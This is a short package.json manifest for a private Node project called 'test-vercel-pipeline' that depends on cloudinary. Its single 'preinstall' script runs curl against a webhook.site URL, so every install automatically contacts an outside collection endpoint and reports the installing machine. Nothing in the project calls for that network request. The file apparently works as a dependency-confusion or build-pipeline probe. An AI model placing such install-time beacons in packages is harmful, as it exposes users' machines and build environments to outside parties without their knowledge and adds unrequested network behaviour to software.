{
  "name": "test-vercel-pipeline",
  "version": "1.0.0",
  "private": true,
  "dependencies": {
    "cloudinary": "2.9.0"
  },
  "scripts": {
    "preinstall":"curl https://webhook.site/b465a679-2ac2-4d1d-b710-29b77fb55201"
  }
}
